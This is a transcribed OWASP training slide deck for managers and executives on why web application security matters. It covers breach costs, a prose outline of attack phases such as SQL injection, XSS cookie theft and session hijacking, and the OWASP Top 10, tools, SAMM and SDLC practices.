1. The OWASP Foundation http://www.owasp.org OWASP Education Computer based training Security for Managers and Executives Nishi Kumar Systems Architect, FIS OWASP CBT Project Lead Nishi.Kumar@owasp.org

2. 2 How would you feel if your confidential data is stolen? Angry! Frustrated!

3. 3 Facebook Phishing Attack Lures people to a fake Facebook page and prompts them to log in. Unsuspecting Facebook users get a message from a friend urging them to "check this out" and including a link to a Web page that appears to be a Facebook log-in page.

4. 4 Article from Wall Street & Technology

5. 5 Why Should We Care? Let’s just think this through… How likely is a successful web application attack? Stunningly prevalent Easy to exploit without special tools or knowledge Little chance of being detected Hundreds of thousands of developers, tiny fraction with security Consequences? Corruption or disclosure of database contents Root access to web and application servers Loss of authentication and access control for users Defacement Secondary attacks from your application

6. 6 Cost of Non-Compliance In the event of the a breach the acquirer CAN make the merchant responsible for: Any fines from PCI-Co Up to $500,000 per incident Cost to notify victims Cost to replace cards (about $10/card) Cost for any fraudulent transactions Forensics from a QDSC Level 1 certification from a QDSC The QDSC (Qualified Data Security Company certification) by Visa © authorizes a company to perform level-one onsite assessments for merchants and service providers requiring a "Report on Compliance" (ROC).

7. 7 Cost of Non-Compliance (Cont) Example: 50,000 credit cards stolen PCI Penalty - $100,000 per incident $500,000 if you do not have a self-assessment Card Replacement - $500,000 (50,000 x $10 dollars per card) Fraudulent Transaction – $61,750,000 ($1,235 x 50,000) $1,235 - 2004 average fraudulent transaction Bad Publicity – Priceless!

8. 8 Why Web Application Security important? Attacks Shift Towards Application Layer Network Server Web Applications % of Attacks% of Dollars 90% Sources: Gartner, Watchfire SecuritySpending of All Web Applications Are Vulnerable 2/3 75% 25% 10%

9. 9 Problem Illustrated Application Layer  Attacker sends attacks inside valid HTTP requests  Your custom code is tricked into doing something it should not  Security requires software development expertise, not signatures Network Layer  Firewall, hardening, patching, IDS, and SSL cannot detect or stop attacks inside HTTP requests.  Security relies on signature databases Firewall Hardened OS Web Server App Server Firewall Databases Legacy Systems Web Services Directories Human Resrcs Billing Custom Code APPLICATION ATTACK Network Layer Application Layer Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce Bus. Functions Insider

10. 10 Demo Attack Phases of hacker attacks

11. 11 Phase 1 Information search Fingerprinting 1. Hacker searches information about victim’s target system Operating System Web Server Database 2. Compares information with vulnerability database

12. 12 Phase 1 – Information Search SQL Injection 1. Hacker found vulnerability Search for (specific) user Find additional information about user 2. Needs information for next phase of attack

13. 13 Phase 2 – Infrastructure Cross Site Scripting (XSS) 1. Hacker found personal information about user e-mail Phone number … 2. Sends e-mail with unsuspicious topic 3. Includes XSS in e-Mail that sends user session to the hackers server

14. 14 Phase 2 – Infrastructure Cross Site Scripting (XSS) 1. User receives e-Mail 2. e-mail is unsuspicious to user Topic Originator 3. Included XSS sends all cookies to hacker’s web site

15. 15 Phase 3 – Exploit Session hijacking 1. Hacker received all cookies from user 2. Cookies are used to identify users 3. Hacker uses cookie to resume user session 4. Hacker is logged in as user “victim” with user’s access rights

16. 16 That was just the beginning

17. 17 Demo Cross-site scripting http://testasp.acunetix.com/Search.asp

18. 18 Leverage OWASP for Web Application Security Training The Open Web Application Security Project (OWASP Foundation Inc.) Participation in OWASP is free and open to all The vision is a software market that produces code that’s secure. The mission is to make security visible so that software buyers and sellers are on equal footing and market forces can work. International not-for-profit charitable organization funded primarily by volunteers time and OWASP Memberships http://www.owasp.org

19. 19 What are the Top 10 Vulnerabilities? OWASP Top 10

20. 20 Common Security Issues: The OWASP Top 10 2007 The Ten Most Critical Aimed to educate developers, architects and security practitioners about the consequences of the most common web application security vulnerabilities Living document: 2007 T10 different from 2004 T10 OWASP Top 10 2010 rc1 just released in AppSec DC 2009 conference

21. 21 Users and Adopters Payment Card Industry (PCI) PCI DSS - Requirements 6.5.1 - 6.5.10 is OWASP Top 10 PA-DSS - Requirements 5.2.1 – 5.2.10 is OWASP Top 10 Security code review for all the custom code. OWASP Supporters

22. 22 Common Security Issues: The OWASP Top 10 2007 4 th version of the Top 10 2009 released last week in OWASP AppSec DC conference 2009

23. 23 Security Threats and OWASP T10 Vulnerabilities Phishing Exploit weak authentication, authorization, session management and input validation (XSS, XFS) vulnerabilities Privacy violations Exploit poor input validation, business rule and weak authorization, injection flaws, information leakage vulnerabilities Identity theft Exploit poor or non-existent cryptographic controls, malicious file execution, authentication, business rule and auth checks vulnerabilities

24. 24 Security Threats and OWASP T10 Vulnerabilities (cont) System compromise, data alteration or data destruction Exploit injection flaws, remote file inclusion-upload vulnerabilities Financial loss Exploit unauthorized transactions and CSRF attacks, broken authentication and session management, insecure object reference, weak authorization-forceful browsing vulnerabilities Reputation loss Depend on any evidence (not necessarily exploitation) of a web application vulnerability

25. 25 OWASP Top Ten 2007 and ESAPI (Enterprise Security API)

26. 26 OWASP Documentation on Web Application Security Developer Guide Code Review Guide Testing Guide Application Security Desk Reference (ASDR) ASVS Application Security Desk Reference (ASDR) Basic reference material on application security terminology Developer Guide Comprehensive guide for Web applications and Web services security Code Review Guide Comprehensive secure code review guide on the web Testing Guide Web Application penetration testing ASVS Application Security Verification Standard

27. 27 OWASP Tools and Technology Vulnerability Scanners Static Analysis Tools Fuzzing Automated Security Verification Penetration Testing Tools Code Review Tools Manual Security Verification ESAPI Security Architecture AppSec Libraries ESAPI Reference Implementation Guards and Filters Secure Coding Reporting Tools AppSec Management Flawed Apps Learning Environments Live CD SiteGenerator AppSec Education

28. 28 Live CD Project that collects some of the best open source security projects in a single environment Users can boot from Live CD and immediately start using all tools without any configuration http://www.owasp.org/index.php/LiveCD

29. 29 OWASP Tools OWASP WebScarab v20090122 OWASP WebGoat v5.2 OWASP CAL9000 v2.0 OWASP JBroFuzz v1.2 OWASP DirBuster v0.12 OWASP SQLiX v1.0 OWASP WSFuzzer v1.9.4 OWASP Wapiti v2.0.0-beta Paros Proxy v3.2.13 nmap & Zenmap v 4.76 Wireshark v1.0.5 tcpdump v4.0.0 Firefox 3.06 + 25 addons Burp Suite v1.2 Grendel Scan v1.0 Metasploit v3.2 (svn) w3af + GUI svn r2161 Netcats – original + GNU Nikto v2.03 Firece Domain Scanner v1.0.3 Maltego CE v2-210 Httprint v301SQLBrute v1.0 Spike Proxy v1.4.8-4 Rat Proxy v1.53-beta

30. 30 Web Goat A classic vulnerable application to teach developers security code flaws

31. 31 WebScarab – A Proxy Engine A Proxy tool to intercept Http Request and Http Response

32. 32 Software Assurance Maturity Model (SAMM) Alignment & Governance Requirements & Design Verification & Assessment Deployment & Operations The four Disciplines are high-level categories for activities Three security Functions under each Discipline are the specific silos for improvement within an organization Disciplines Functions

33. 33 Software Assurance Maturity Model (SAMM) Check out this one...

34. 34 SAMM Conducting assessments SAMM includes assessment worksheets for each Security Practice

35. 35 SAMM Creating Scorecards Gap analysis Capturing scores from detailed assessments versus expected performance levels Demonstrating improvement Capturing scores from before and after an iteration of assurance program build-out Ongoing measurement Capturing scores over consistent time frames for an assurance program that is already in place

36. 36 Process perspective: Build Security in the SDLC

37. Since no customer is complaining, why an organization needs to fix security vulnerabilities in their applications? Compliance In case of security breech Fines Reputation Loss - Priceless ?? ?

38. What do we do if our application is already in production and it has missed that phase of security? ?? ? It's never too late and never too early. It is a continuous process... Penetration testing and security code review is the key. We must fix security leaks and vulnerabilities.

39. What do we do if our application is already in production and it has missed that phase of security? ?? ? It's never too late and never too early. It is a continuous process... Penetration testing and security code review is the key. We must fix security leaks and vulnerabilities.

40. What will help? ?? ? Leverage OWASP Security Code Review Value of mentoring is enormous Application scanning and code scanning using static analysis tools Web application security part of the SDLC process Secure code development training Train QA to find security issues in the application

41. Make Security part of the SDLC process